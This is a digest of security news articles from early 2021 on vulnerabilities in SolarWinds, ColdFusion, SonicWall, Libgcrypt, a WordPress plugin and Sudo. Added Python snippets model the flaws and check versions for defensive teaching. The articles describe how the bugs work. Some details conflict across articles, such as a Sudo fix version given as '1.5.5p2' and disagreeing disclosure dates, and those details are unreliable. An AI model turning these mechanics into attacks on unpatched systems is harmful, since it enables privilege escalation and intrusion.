“Following the recent nation-state attack against an array of American software providers, including SolarWinds, we have been collaborating with our industry partners and government agencies to advance our goal of making SolarWinds the most secure and trusted software company,” SolarWinds said in an emailed statement.

It added, “We have always been committed to working with our customers and other organizations to identify and remediate any vulnerabilities across our product portfolio in a responsible way. Today’s announcement aligns with this process.”

Trustwave says it plans on releasing proof-of-concept (PoC) code for these vulnerabilities only on February 9 in order to give SolarWinds customers more time to install the patches.


Weak ACLs in Adobe ColdFusion Allow Privilege Escalation
4.2.2021 
Vulnerebility  Securityweek

A newly disclosed vulnerability in Adobe ColdFusion could be exploited by unprivileged users for the execution of arbitrary code with SYSTEM privileges.

The popular commercial web-application development platform uses the CFML scripting language and is mainly used for the creation of data-driven websites.

This week, Will Dormann, a security researcher with Carnegie Mellon University’s CERT Coordination Center (CERT/CC), revealed that the Adobe ColdFusion installer doesn’t create a secure access-control list (ACL) on the default installation directory.

Because no properly restrictive ACL is set, any unprivileged user can create files within the platform’s directory structure, which leads to a privilege escalation flaw.

An unprivileged user on a Windows computer, Dormann explains, could place a specially-crafted DLL file within the installation directory of Adobe ColdFusion, which would result in arbitrary code being executed with SYSTEM privileges. This type of attack is known as DLL hijacking.

Threat actors who have already established a foothold on a Windows machine running a vulnerable ColdFusion installation could target this vulnerability to execute malicious code with elevated privileges.

In the vulnerability note published on CERT/CC’s website, Dormann explains that mitigation steps for the security issue involve the use of the ColdFusion Server Auto-Lockdown installer.

“By default, ColdFusion does not configure itself securely. In order to secure ColdFusion with respect to service privileges, ACLs, and other attributes, the ColdFusion Server Auto-Lockdown installer must be installed in addition to installing ColdFusion itself,” he notes.

Mitigations vary depending on the ColdFusion version in use: while auto-lockdown installers are available for ColdFusion 2018 and ColdFusion 2021, users of ColdFusion 2016 will have to apply the changes that Adobe has detailed in the ColdFusion 2016 Lockdown Guide.

Contacted by SecurityWeek, Adobe has confirmed the vulnerability: “Adobe worked with the researcher who brought this matter to our attention and mitigation steps are included within the researcher’s note.”

ColdFusion has long been a target of threat actors, and Adobe has patched at least a handful of vulnerabilities already exploited in attacks, either on Patch Tuesday or with out-of-band updates.

Applying the mitigation steps for the newly discovered vulnerability as soon as possible will help users ensure their systems are not exposed to attacks.


3 New Severe Security Vulnerabilities Found In SolarWinds Software
4.2.2021 
Vulnerebility  Thehackernews

Cybersecurity researchers on Wednesday disclosed three severe security vulnerabilities impacting SolarWinds products, the most severe of which could have been exploited to achieve remote code execution with elevated privileges.

Two of the flaws (CVE-2021-25274 and CVE-2021-25275) were identified in the SolarWinds Orion Platform, while a third separate weakness (CVE-2021-25276) was found in the company's Serv-U FTP server for Windows, said cybersecurity firm Trustwave in technical analysis.

None of the three security issues have been exploited in the unprecedented supply chain attack targeting the Orion Platform that came to light last December.

The two sets of vulnerabilities in Orion and Serv-U FTP were disclosed to SolarWinds on December 30, 2020, and January 4, 2021, respectively, following which the company resolved the issues on January 22 and January 25.

It's highly recommended that users install the latest versions of Orion Platform and Serv-U FTP (15.2.2 Hotfix 1) to mitigate the risks associated with the flaws. Trustwave said it intends to release a proof-of-concept (PoC) code next week on February 9.

Complete Control Over Orion
Chief among the vulnerabilities uncovered by Trustwave is the improper use of Microsoft Messaging Queue (MSMQ), which is used heavily by the SolarWinds Orion Collector Service. It allows unauthenticated users to send messages to such queues over TCP port 1801, and an attacker can chain this with an unsafe deserialization issue in the code that handles incoming messages to achieve RCE.

"Given that the message processing code runs as a Windows service configured to use LocalSystem account, we have complete control of the underlying operating system," Trustwave researcher Martin Rakhmanov said.

The patch released by SolarWinds (Orion Platform 2020.2.4) addresses the bug with a digital signature validation step that's performed on arrived messages to ensure that unsigned messages are not processed further, but Rakhmanov cautioned that the MSMQ is still unauthenticated and allows anyone to send messages to it.

The second vulnerability, also found in the Orion Platform, concerns the insecure manner in which the credentials of the backend database (named "SOLARWINDS_ORION") are stored in a configuration file. A local, unprivileged user could recover them to take complete control over the database, steal information, or even add a new admin-level user to be used inside SolarWinds Orion products.

Lastly, a flaw in SolarWinds Serv-U FTP Server 15.2.1 for Windows could allow any attacker who can log in to the system locally or via Remote Desktop to drop a file that defines a new admin user with full access to the C:\ drive. Logging in as that user via FTP then lets the attacker read or replace any file on the drive.

U.S. Department of Agriculture Targeted Using New SolarWinds Flaw
News of the three vulnerabilities in SolarWinds products comes on the heels of reports that alleged Chinese threat actors exploited a previously undocumented flaw in the company's software to break into the National Finance Center, a federal payroll agency inside the U.S. Department of Agriculture.

This flaw is said to be different from those that were abused by suspected Russian threat operatives to compromise SolarWinds Orion software that was then distributed to as many as 18,000 of its customers, according to Reuters.

In late December, Microsoft said a second hacker collective might have been abusing the IT infrastructure provider's Orion software to drop a persistent backdoor called Supernova on target systems by taking advantage of an authentication bypass vulnerability in the Orion API to execute arbitrary commands.

SolarWinds issued a patch to address the vulnerability on December 26, 2020.

Last week, Brandon Wales, acting director of the U.S. Cybersecurity and Infrastructure Agency (CISA), said nearly 30% of the private-sector and government agencies linked to the intrusion campaign had no direct connection to SolarWinds, implying that the attackers used a variety of ways to breach target environments.

The overlap in the twin espionage efforts notwithstanding, the campaigns are yet another sign that advanced persistent threat (APT) groups are increasingly focusing on the software supply chain as a conduit to strike high-value targets such as corporations and government agencies.

The trust and ubiquity of software such as those from SolarWinds or Microsoft make them a lucrative target for attackers, thus underscoring the need for organizations to be on the lookout for potential dangers stemming from relying on third-party tools to manage their platforms and services.


SonicWall Says 'a Few Thousand Devices' Impacted by Zero-Day Vulnerability
3.2.2021 
Vulnerebility  Securityweek

SonicWall on Monday confirmed that its Secure Mobile Access (SMA) 100 series appliances are affected by a zero-day vulnerability that has apparently already been exploited in attacks.

SonicWall told SecurityWeek that a few thousand devices are exposed to attacks due to the zero-day vulnerability. The cybersecurity solutions provider says it’s working on developing patches and, in the meantime, it has shared some recommendations on how customers can protect their networks against potential attacks.

The company revealed on January 22 that it had identified a “coordinated attack on its internal systems” that was apparently launched by a highly sophisticated threat group that may have exploited zero-day vulnerabilities in some of the company’s secure remote access products.

SonicWall initially said its NetExtender VPN client and SMA 100 series products may be impacted, but it later determined that the NetExtender VPN client, SonicWall firewalls, SMA 1000 series devices, and SonicWave APs are not affected.

Only SMA 100 series devices remained under investigation, but an update shared on January 29 said the company could still not confirm the existence of a zero-day vulnerability affecting these products.

On Sunday, January 31, however, cybersecurity firm NCC Group reported discovering a possible candidate for the vulnerability, for which the company had seen “indiscriminate” exploitation attempts in the wild.

Following NCC’s report, SonicWall on Monday confirmed the existence of a zero-day flaw affecting SMA 100 series 10.x physical and virtual devices, specifically SMA 200, SMA 210, SMA 400, SMA 410 and SMA 500v. The vendor said firewalls, 1000 series appliances and VPN clients do not appear to be affected, and neither are SMA 100 series devices running a firmware version prior to 10.x. A CVE identifier has yet to be assigned for this vulnerability.

SonicWall hopes to release a patch by the end of the day on February 2. In the meantime, customers can prevent potential attacks by enabling multi-factor authentication and changing passwords for accounts that used affected SMA appliances, by blocking access to the appliances on the firewall, by shutting down impacted appliances, or by downgrading the firmware on the device to version 9.x.

Shortly after SonicWall disclosed the breach, some anonymous individuals claimed the company was hit by ransomware and the attackers had stolen source code and customer data, but none of those claims have been confirmed. At least some of the claims seen by SecurityWeek at the time seemed questionable.


Google Discloses Severe Bug in Libgcrypt Encryption Library—Impacting Many Projects
1.2.2021 
Vulnerebility  Thehackernews

A "severe" vulnerability in GNU Privacy Guard (GnuPG)'s Libgcrypt encryption software could have allowed an attacker to write arbitrary data to the target machine, potentially leading to remote code execution.

The flaw, which affects version 1.9.0 of libgcrypt, was discovered on January 28 by Tavis Ormandy of Project Zero, a security research unit within Google dedicated to finding zero-day bugs in hardware and software systems.

No other versions of Libgcrypt are affected by the vulnerability.

"There is a heap buffer overflow in libgcrypt due to an incorrect assumption in the block buffer management code," Ormandy said. "Just decrypting some data can overflow a heap buffer with attacker controlled data, no verification or signature is validated before the vulnerability occurs."

GnuPG addressed the weakness almost immediately within a day after disclosure, while urging users to stop using the vulnerable version. The latest version can be downloaded here.

The Libgcrypt library is an open-source cryptographic toolkit offered as part of GnuPG software suite to encrypt and sign data and communications. An implementation of OpenPGP, it's used for digital security in many Linux distributions such as Fedora and Gentoo, although it isn't as widely used as OpenSSL or LibreSSL.

According to GnuPG, the bug appears to have been introduced in 1.9.0 during its development phase two years ago as part of a change to "reduce overhead on generic hash write function," but it was only spotted last week by Google Project Zero.

Thus all an attacker needs to do to trigger this critical flaw is to send the library a block of specially-crafted data to decrypt, thus tricking the application into running an arbitrary fragment of malicious code embedded in it (aka shellcode) or crash a program (in this case, gpg) that relies on the libgcrypt library.

"Exploiting this bug is simple and thus immediate action for 1.9.0 users is required," Libgcrypt author Werner Koch noted. "The 1.9.0 tarballs on our FTP server have been renamed so that scripts won't be able to get this version anymore."


WordPress Pop-Up Builder Plugin Flaw Plagues 200K Sites

30.1.2021  Vulnerebility  Threatpost

The flaw could have let attackers send out custom newsletters and delete newsletter subscribers from 200,000 affected websites.

Developers of a plugin, used by WordPress websites for building pop-up ads for newsletter subscriptions, have issued a patch for a serious flaw. The vulnerability could be exploited by attackers to send out newsletters with custom content, or to delete or import newsletter subscribers.

The plugin in question is Popup Builder – Responsive WordPress Pop up – Subscription & Newsletter, from developer Sygnoos. The plugin has been installed on 200,000 WordPress websites. Versions 3.71 and below are affected by the vulnerability (a fix has been issued in version 3.72; and the latest version is 3.73).

“The only requirement for exploitation is that the user is logged in and has access to the nonce token,” said researchers with WebArx on Friday. “It is affecting methods which in turn could cause damage to the reputation and security status of the site.”

The issue stems from a lack of authorization for AJAX methods in the plugin. AJAX is a set of web-development techniques that are used to create web applications; the AJAX method is used to perform an AJAX request.

In this case, the AJAX method does not check the capability of the user. Because of this, the AJAX endpoint, intended to be accessible only to administrators, could also allow subscriber-level users to perform a number of actions that compromise the site’s security, researchers said. A subscriber is a user role in WordPress, usually one with very limited capabilities, such as logging into the website and leaving comments.

One vulnerable method is related to the importConfigView.php file. Without authorization, attackers could utilize this method to import a list of subscribers from a remote URL, which is then handled in the method saveImportedSubscribers. Attackers could also leverage the importConfigView.php file to import malicious files from the remote URL. The only limitation is that if it is not a legitimate CSV file (files designed to easily export data and import it into other programs), the file will only output the first line of the given file, said researchers. Another vulnerable method allows attackers to send out a newsletter using newsletter data taken from the $_POST['newsletterData'] user input variable.

“This can also include custom email body content, email sender, and several other attributes that will essentially allow a malicious user to send out emails to all subscribers,” said researchers.

Researchers noted that a nonce token is checked – but because this nonce token is sent to all users regardless of their capabilities, any user can execute the vulnerable AJAX methods as long as they pass the nonce token. A nonce is a cryptographic number, used by authentication protocols to protect private communications by preventing replay attacks.

Researchers discovered the flaw on Dec. 2, 2020, and notified the developer on the same day. A patch was released for the flaw on Jan. 22, 2021 in version 3.72 of the plugin. In this version, the AJAX actions now have an authorization check barring attackers from exploiting the flaw.

WordPress plugins have been found to have serious vulnerabilities. Earlier in January, researchers warned of two vulnerabilities (one critical) in a WordPress plugin called Orbit Fox that could allow attackers to inject malicious code into vulnerable websites and/or take control of a website.


Experts addressed flaws in Popup Builder WordPress plugin
30.1.2021 
Vulnerebility  Securityaffairs

Multiple issues in WordPress ‘Popup Builder’ Plugin could be exploited by hackers to perform various malicious actions on affected websites.
Developers behind the “Popup Builder – Responsive WordPress Pop up – Subscription & Newsletter” WordPress plugin have recently addressed multiple vulnerabilities that can be exploited to perform various malicious actions on affected websites.

The plugin has over 200,000 active installations to date, it allows WordPress site owners to create, customize, and manage promotion modal popups.

Experts from the security firm WebARX state that the flaws in the “Popup Builder – Responsive WordPress Pop up – Subscription & Newsletter” plugin are caused by the lack of authorization in most AJAX methods.

“The authorization issues in the plugin are caused due to many of the AJAX methods not checking the capability of the user. A method to check the capability of the user is present in the plugin but was not used in these methods.” reads the post published by WebARX.

“A nonce token on the other hand is checked but since this nonce token is sent to all users regardless of their capabilities, any user can execute the vulnerable AJAX methods as long as they pass the nonce token.”

The lack of authorization could allow attackers to send out newsletters with any content, perform local file inclusion (limited to the first line of the file), import or delete subscribers, and carry out other activities.

The plugin fails to check a nonce token, and users with any capability can execute the vulnerable AJAX methods.

The experts provided information about some of the vulnerable methods but did not include details about all the affected functions.

One of the vulnerable methods allows users to import a list of subscribers from a remote URL, while another could be abused by an authenticated user to send out newsletters with “custom email body content, email sender, and several other attributes that will essentially allow a malicious user to send out emails to all subscribers.”

The flaws could be exploited by a logged-in user with access to the nonce token.
“However, it is affecting methods which in turn could cause damage to the reputation and security status of the site.” concludes the report.

Below is the timeline for the flaws:
2nd December 2020 – We discovered the vulnerability and released a virtual patch to all WebARX customers.
2nd December 2020 – We reported the issue to the developer of the Popup Builder plugin.
3rd December 2020 – The developer replied and started working on a fix.
8th December 2020 – The developer released version 3.71 which only added an authorization check to the AJAX method to send newsletters, not all of them.
4th of January 2021 – Asked the developer for an update regarding progress on a new fixed version.
12th of January 2021 – No response so far, asked the developer for an update again.
22nd of January 2021 – Version 3.72 was released which contains the proper fixes, the AJAX actions now have an authorization check.
28th of January 2021 – Published the article.


Many WordPress Sites Affected by Vulnerabilities in 'Popup Builder' Plugin
29.1.2021 
Vulnerebility  Securityweek

Multiple vulnerabilities patched recently in the popular WordPress plugin Popup Builder could be exploited to perform various malicious actions on affected websites.

With over 200,000 installations to date, “Popup Builder – Responsive WordPress Pop up – Subscription & Newsletter” is a plugin that helps WordPress site owners create, customize, and manage promotion modal popups.

Discovered by researchers at website security company WebARX, the recently addressed issues are caused by the lack of authorization on most AJAX methods, and impact all Popup Builder versions up to 3.71.

The missing authorizations create security flaws that could be leveraged to send out newsletters with any content, for local file inclusion (but limited to first-line), to import or delete subscribers, and perform other actions as well.

The bugs, WebARX explains, exist because the AJAX methods fail to check the capability of the user, although a method to perform the check has been implemented in the plugin.

The plugin does check a nonce token, but the nonce is sent to all users, so any user – regardless of capability – can pass the check and execute the vulnerable AJAX methods.
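The distinction the researchers draw, a nonce check that passes for every logged-in user versus a capability check that actually authorizes the action, as an added example that is not Popup Builder's code. It is a constructed Python model of a WordPress-style AJAX handler: the secret key, the action name `example_send_newsletter`, the role-to-capability map and the `send_newsletter` stand-in are all assumptions, and `create_nonce`/`user_can` play the roles of a simplified `wp_create_nonce()`/`current_user_can()`.

```python
import hashlib
import hmac

# Constructed model of a WordPress-style AJAX handler (added example, not
# Popup Builder's code). A nonce proves the request came from a page the
# site served to that logged-in user; it is an anti-CSRF measure and says
# nothing about whether the user is *allowed* to perform the action.

SECRET_KEY = b"constructed-site-secret"   # placeholder, not a real key
ACTION = "example_send_newsletter"        # hypothetical action name

# Minimal role -> capability map in the spirit of WordPress roles (assumption).
CAPABILITIES = {
    "administrator": {"manage_options", "edit_posts"},
    "subscriber": set(),
}


def create_nonce(user_id: int, action: str) -> str:
    """Keyed hash bound to (action, user), like a simplified wp_create_nonce().
    Every logged-in user receives a valid nonce for their own requests."""
    msg = f"{action}|{user_id}".encode()
    return hmac.new(SECRET_KEY, msg, hashlib.sha256).hexdigest()[:10]


def verify_nonce(user_id: int, action: str, nonce: str) -> bool:
    return hmac.compare_digest(create_nonce(user_id, action), nonce)


def user_can(role: str, capability: str) -> bool:
    """Stand-in for current_user_can()."""
    return capability in CAPABILITIES.get(role, set())


def send_newsletter(body: str) -> str:
    # Stand-in for the side effect; the real plugin mails every subscriber.
    return f"sent: {body}"


def ajax_send_newsletter_vulnerable(user_id: int, role: str, nonce: str, body: str) -> str:
    """The pattern described in the report: only the nonce is checked."""
    if not verify_nonce(user_id, ACTION, nonce):
        return "error: bad nonce"
    return send_newsletter(body)


def ajax_send_newsletter_fixed(user_id: int, role: str, nonce: str, body: str) -> str:
    """Nonce check (anti-CSRF) followed by a capability check (authorization)."""
    if not verify_nonce(user_id, ACTION, nonce):
        return "error: bad nonce"
    if not user_can(role, "manage_options"):
        return "error: insufficient permissions"
    return send_newsletter(body)


def demo() -> dict:
    """A subscriber holding a perfectly valid nonce calls both handlers."""
    sub_nonce = create_nonce(7, ACTION)
    return {
        "subscriber_vulnerable": ajax_send_newsletter_vulnerable(7, "subscriber", sub_nonce, "hi"),
        "subscriber_fixed": ajax_send_newsletter_fixed(7, "subscriber", sub_nonce, "hi"),
        "admin_fixed": ajax_send_newsletter_fixed(1, "administrator", create_nonce(1, ACTION), "hi"),
        "forged_nonce": ajax_send_newsletter_fixed(1, "administrator", "0000000000", "hi"),
    }
```

The vulnerable handler lets the subscriber send the newsletter because the nonce it was handed on page load is genuine; the fixed handler rejects the same request on the capability check. When reviewing AJAX handlers, look for a capability check on every privileged action, not just for the presence of a nonce check.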

WebARX’ researchers have detailed some of the vulnerable methods, but refrained from publishing information on all of them, given that a large number of methods are affected.

One of the vulnerable methods, they reveal, could be abused by an authenticated user to send out newsletters with “custom email body content, email sender, and several other attributes that will essentially allow a malicious user to send out emails to all subscribers.”

To exploit the vulnerability, a user would need to be logged in and to have access to the nonce token, the researchers say.

Some of the affected methods, they also reveal, “could cause damage to the reputation and security status of the site.”

The vulnerabilities were reported to the plugin’s developer in February 2020. An incomplete fix was pushed out in August 2020, with the release of version 3.71 of the plugin, while a proper fix was made available last week, with the release of version 3.72.


Sudo Bug Gives Root Access to Mass Numbers of Linux Systems

28.1.2021  Vulnerebility  Threatpost

Qualys said the vuln gives any local user root access to systems running the most popular version of Sudo.

A doozy of a bug that could allow any local user on most Linux or Unix systems to gain root access has been uncovered — and it had been sitting there for a decade, researchers said.

The bug was found in Sudo, a utility built into most Unix and Linux operating systems that lets a user without security privileges access and run a program with the credentials of another user. Qualys researchers named the vulnerability “Baron Samedit,” tracked as CVE-2021-3156. They said the bug popped into the Sudo code back in July 2011.

“Qualys security researchers have been able to independently verify the vulnerability and develop multiple variants of exploit, and obtain full root privileges on Ubuntu 20.04 (Sudo 1.8.31), Debian 10 (Sudo 1.8.27), and Fedora 33 (Sudo 1.9.2),” the report said. “Other operating systems and distributions are also likely to be exploitable.”

The authors of Sudo have released a patched update, Sudo version 1.5.5p2.

“Not all Unix-like systems use the same implementation of Sudo, but this vulnerability is in the implementation distributed from https://www.sudo.ws/sudo.html (the Sudo main page) and is a widely used implementation,” David A. Wheeler from the Linux Foundation told Threatpost.

But the news on the Sudo bug isn’t all terrible.

Locals Only: The Good News on the Sudo Bug
“One piece of good news: This is not remotely exploitable [without authentication],” Wheeler added. “An attacker must already be able to run programs on the vulnerable computer before this vulnerability can be used.”

Jerry Gamblin, director of security research at Kenna Security, agreed with Wheeler that while the bug is a dangerous vulnerability, the possibility for rampant attacks is low.

“It is important to level-set that to exploit this vulnerability, a bad actor would need remote (SSH) or direct access to a vulnerable Linux machine,” Gamblin told Threatpost. “While it is a vulnerability that should be patched quickly, it does require a certain level of preexisting access, which makes widespread exploitation unlikely.”

That said, malicious insiders or attackers who have achieved initial-stage access to a Linux environment are still perfectly capable of exploiting the issue. Linux botnets are also an attack vector. The recently discovered FreakOut malware, for instance, targets Linux devices with specific products that have not been patched against various flaws. It adds compromised devices to a botnet that can then be used for multiple purposes, such as pushing additional malware or carrying out denial-of-service attacks. It also has brute-force abilities using hard-coded credentials to infect other network devices.

“I expect this CVE to have a CVSS score that falls in the range of 6 to 8. It is a local attack that requires low complexity and affects integrity and confidentiality,” Gamblin said. “The risk for this vulnerability would be significantly higher if you offer terminal access to low privileged users, such as in an educational environment or an environment in which access is given to employees to run or monitor individual tasks.”

Sudo, a Double-Bug Perfect Storm
Here’s how the vuln works: the bug is a heap-based buffer overflow in Sudo that becomes reachable because any local user can trick Sudo into believing it is running in “shell” mode.

Sudo authors explained in a Tuesday advisory that when Sudo is running in shell mode, “it escapes special characters in the command’s arguments with a backslash.” Then, a policy plug-in removes any escape characters before deciding on the Sudo user’s permissions.

But it’s not a single bug that exposed these systems; it’s the combination of two bugs working in tandem in Sudo that makes exploitation possible, the authors explained.

“A bug in the code that removes the escape characters will read beyond the last character of a string if it ends with an unescaped backslash character,” the Sudo authors explained. “Under normal circumstances, this bug would be harmless since Sudo has escaped all the backslashes in the command’s arguments.”

But another vuln, to which the CVE is assigned, was lurking in Sudo that made exploitation a threat.

“However, due to a different bug, this time in the command-line parsing code, it is possible to run “sudoedit” with either the -s or -i options, setting a flag that indicates shell mode is enabled,” according to the alert. “Because a command is not actually being run, Sudo does not escape special characters. Finally, the code that decides whether to remove the escape characters did not check whether a command is actually being run, just that the shell flag is set. This inconsistency is what makes the bug exploitable.”

Linux/Unix Buffer Overflow
Technically speaking, the vulnerable code overflows the heap-based buffer “user_args” which gives attackers control over the size and contents of the overflow and allows them to change bytes in the overflow, according to Qualys.

“For example, on an amd64 Linux, the following command allocates a 24-byte “user_args” buffer (a 32-byte heap chunk) and overwrites the next chunk’s size field with “A=a\0B=b\0” (0x00623d4200613d41), its fd field with “C=c\0D=d\0” (0x00643d4400633d43), and its bk field with “E=e\0F=f\0” (0x00663d4600653d45):” the report said.

Qualys researchers published a proof-of-concept (PoC) video:

Wheeler added that anyone running the system should implement the patched update as soon as possible.

“Another piece of good news is that this is easily fixed and updated; fixing this shouldn’t change how it works in the normal case,” Wheeler added. “So you should immediately update to the fixed version.”


Heap-based buffer overflow in Linux Sudo allows local users to gain root privileges
28.1.2021 
Vulnerebility  Securityaffairs

The CVE-2021-3156 Sudo vulnerability allows any local user to gain root privileges on Unix-like operating systems without authentication.
Sudo is one of the most important, powerful, and commonly used utilities that comes as a core command pre-installed on macOS and almost every UNIX or Linux-based operating system.

sudo is a program for Unix-like computer operating systems that allows users to run programs with the security privileges of another user, by default the superuser. It originally stood for “superuser do” as the older versions of sudo were designed to run commands only as the superuser.

The Sudo CVE-2021-3156 vulnerability, dubbed Baron Samedit, could have been exploited by any local user to gain root privileges on Unix-like operating systems without requiring authentication (i.e., the attacker does not need to know the user’s password).

The privilege escalation issue is a heap-based buffer overflow that was discovered by security researchers from Qualys.

The experts reported the vulnerability on January 13th, but it was publicly disclosed only this week to give the development team time to address the issue.

“Sudo before 1.9.5p2 has a Heap-based Buffer Overflow, allowing privilege escalation to root via “sudoedit -s” and a command-line argument that ends with a single backslash character:” reads the description published by Mitre.

The vulnerability is caused by Sudo incorrectly handling backslashes in the arguments.

The vulnerability was introduced in July 2011 (commit 8255ed69), and affects all versions from 1.8.2 to 1.8.31p2 and all stable versions from 1.9.0 to 1.9.5p1, in their default configuration.

“When sudo runs a command in shell mode, either via the -s or -i command line option, it escapes special characters in the command’s arguments with a backslash. The sudoers policy plugin will then remove the escape characters from the arguments before evaluating the sudoers policy (which doesn’t expect the escape characters) if the command is being run in shell mode.” states the advisory published by the Sudo team.

“A bug in the code that removes the escape characters will read beyond the last character of a string if it ends with an unescaped backslash character. Under normal circumstances, this bug would be harmless since sudo has escaped all the backslashes in the command’s arguments. However, due to a different bug, this time in the command line parsing code, it is possible to run sudoedit with either the -s or -i options, setting a flag that indicates shell mode is enabled. Because a command is not actually being run, sudo does not escape special characters. Finally, the code that decides whether to remove the escape characters did not check whether a command is actually being run, just that the shell flag is set. This inconsistency is what makes the bug exploitable.”
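The two-bug interaction described in the advisory just quoted (and in the Threatpost piece above, “Sudo, a Double-Bug Perfect Storm”), as an added example that is not Sudo's source code. It is a constructed Python model: the front end escapes shell-special characters only when a command really runs in shell mode, while the policy side removes escapes whenever the shell flag is set, so an argument ending in an unescaped backslash makes the unchecked unescaper look one character past the end. The escaping rule is simplified (Sudo's real rule differs in detail), and because Python strings cannot be over-read the C heap over-read is modelled as an `IndexError`.

```python
# Constructed model of the two-bug interaction described in the Sudo advisory
# (added example; not Sudo's source). Python strings cannot be over-read, so
# the C heap over-read is modelled as an IndexError when the unescaper looks
# one character past the end of the argument.
from typing import List


def escape_arg(arg: str) -> str:
    """Front-end escaping, simplified: prefix every character that is not
    alphanumeric, '_' or '-' with a backslash."""
    return "".join(c if (c.isalnum() or c in "_-") else "\\" + c for c in arg)


def unescape_unchecked(arg: str) -> str:
    """Escape removal without an end-of-string check. A backslash in the last
    position makes it inspect arg[i + 1], one past the end: the bug."""
    out: List[str] = []
    i = 0
    while i < len(arg):
        if arg[i] == "\\" and not arg[i + 1].isspace():  # arg[i + 1] may not exist
            i += 1                                        # drop the backslash
        out.append(arg[i])
        i += 1
    return "".join(out)


def unescape_checked(arg: str) -> str:
    """The same loop with the bounds check the fix adds; a trailing backslash is kept."""
    out: List[str] = []
    i = 0
    while i < len(arg):
        if arg[i] == "\\" and i + 1 < len(arg) and not arg[i + 1].isspace():
            i += 1
        out.append(arg[i])
        i += 1
    return "".join(out)


def process(args: List[str], shell_mode: bool, running_command: bool, fixed: bool = False) -> List[str]:
    """Return the arguments as the policy plugin ends up seeing them.

    shell_mode:      -s or -i was given (the shell flag is set)
    running_command: a command will actually be executed; False models sudoedit
    fixed:           apply both corrections (bounds check, and unescape only
                     when a command is really run)
    """
    if shell_mode and running_command:
        args = [escape_arg(a) for a in args]          # front end escapes
    unescape = unescape_checked if fixed else unescape_unchecked
    # Flawed policy: unescape whenever the shell flag is set.
    # Fixed policy:  only when a command is really being run.
    if shell_mode and (running_command or not fixed):
        args = [unescape(a) for a in args]            # policy removes escapes
    return args


def reads_past_end(arg: str, fixed: bool = False) -> bool:
    """True if handling `arg` in the sudoedit -s configuration (shell flag set,
    no command run, so nothing was escaped) steps past the end of the string."""
    try:
        process([arg], shell_mode=True, running_command=False, fixed=fixed)
    except IndexError:
        return True
    return False
```

With a real command in shell mode the escape/unescape pair round-trips cleanly, which is why the unchecked loop was harmless for years; only the sudoedit path, where the shell flag is set but nothing was escaped, feeds the unescaper a trailing backslash. The fix closes both halves: the unescaper checks the bound, and the policy no longer unescapes unless a command is really run.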

Qualys researchers developed three exploits for this flaw that allowed them to achieve full root privileges on major Linux distributions, including Ubuntu 20.04 (Sudo 1.8.31), Debian 10 (Sudo 1.8.27), and Fedora 33 (Sudo 1.9.2). Experts pointed out that the CVE-2021-3156 exploits could also work on other distributions.

A video PoC showing how the CVE-2021-3156 vulnerability can be exploited is embedded below.

The Sudo contributors addressed the flaw with the release of the 1.9.5p2 version.

In February 2020, security expert Joe Vennix from Apple discovered an important vulnerability in the ‘sudo’ utility, tracked as CVE-2019-18634, that allows non-privileged Linux and macOS users to run commands as root.

In October 2019, experts discovered another security policy bypass issue, tracked as CVE-2019-14287, in the Sudo utility installed as a command on almost every Linux and Unix system.


Ten-Year-Old Sudo Vulnerability Gives Root Privileges on Host
28.1.2021 
Vulnerebility  Securityweek

A major security hole in the Sudo utility could be abused by unprivileged users to gain root privileges on the vulnerable host, Qualys reports.

Designed to allow users to run programs with the security privileges of another user (by default superuser, hence the name, which is derived from ‘superuser do’), Sudo is present in major Unix- and Linux-based operating systems out there.

Tracked as CVE-2021-3156, the recently identified vulnerability, which Qualys refers to as “Baron Samedit,” was introduced in July 2011, and can be exploited to gain root privileges using a default Sudo configuration.

This means that an attacker able to compromise a low-privileged account on the machine could abuse the vulnerability to gain root access.

All legacy versions of Sudo, from 1.8.2 to 1.8.31p2, as well as the utility’s stable releases from 1.9.0 to 1.9.5p1 are affected, in their default configuration.
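A fleet-inventory check against the affected ranges stated here (1.8.2 to 1.8.31p2 and 1.9.0 to 1.9.5p1), as an added example that is neither Qualys' nor the Sudo project's code. The wrinkle worth showing is the `pN` patch level: 1.8.31p2 sorts after 1.8.31, so a plain string comparison gets it wrong. `check_local_sudo` runs `sudo --version`, which needs no privileges and prints a first line of the form `Sudo version X.Y.Z`; the banner format is assumed from that command's normal output.

```python
import re
import subprocess
from typing import Optional, Tuple

# Added example; not from Qualys or the Sudo project. The affected ranges are
# the ones stated in the advisory: 1.8.2 - 1.8.31p2 and 1.9.0 - 1.9.5p1.

VERSION_RE = re.compile(r"^(\d+)\.(\d+)\.(\d+)(?:p(\d+))?$")
Version = Tuple[int, int, int, int]


def parse_version(text: str) -> Version:
    """'1.8.31p2' -> (1, 8, 31, 2); a missing 'pN' patch level counts as 0."""
    m = VERSION_RE.match(text.strip())
    if not m:
        raise ValueError(f"unrecognised sudo version string: {text!r}")
    major, minor, patch, plevel = m.groups()
    return int(major), int(minor), int(patch), int(plevel or 0)


AFFECTED_RANGES = [
    (parse_version("1.8.2"), parse_version("1.8.31p2")),
    (parse_version("1.9.0"), parse_version("1.9.5p1")),
]


def is_affected(version: str) -> bool:
    """True if the upstream version string falls inside an affected range."""
    v = parse_version(version)
    return any(lo <= v <= hi for lo, hi in AFFECTED_RANGES)


def version_from_banner(banner: str) -> str:
    """Pull the version out of `sudo --version` output ('Sudo version 1.8.31 ...')."""
    m = re.search(r"^Sudo version (\S+)", banner, re.MULTILINE)
    if not m:
        raise ValueError("no 'Sudo version' line found")
    return m.group(1)


def check_local_sudo() -> Optional[bool]:
    """Run `sudo --version` on this host; None if sudo is not installed."""
    try:
        proc = subprocess.run(["sudo", "--version"], capture_output=True,
                              text=True, check=False)
    except FileNotFoundError:
        return None
    return is_affected(version_from_banner(proc.stdout))


if __name__ == "__main__":
    verdict = {None: "sudo not found",
               True: "version string is in an affected range",
               False: "version string is outside the affected ranges"}
    print(verdict[check_local_sudo()])
```

Treat a hit as "go and check", not as proof of exposure: distributions commonly backport the fix into a package revision without changing the upstream version string, so the package changelog or the distribution's advisory is the authoritative source for a given host.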

Qualys’ security researchers said they came up with exploit variants to obtain full root privileges on Linux distributions such as Debian 10 (Sudo 1.8.27), Fedora 33 (Sudo 1.9.2), and Ubuntu 20.04 (Sudo 1.8.31), but noted that other operating systems and distributions that rely on Sudo might be affected as well.

The bug was reported to the Sudo team a couple of weeks ago, and patches were rolled out today. Sudo v1.9.5p2 resolves the vulnerability.

“Given the breadth of the attack surface for this vulnerability, Qualys recommends users apply patches for this vulnerability immediately,” the security researchers note.

Qualys, which provides an in-depth technical analysis of the vulnerability, has published a proof-of-concept video to demonstrate how the issue can be exploited.

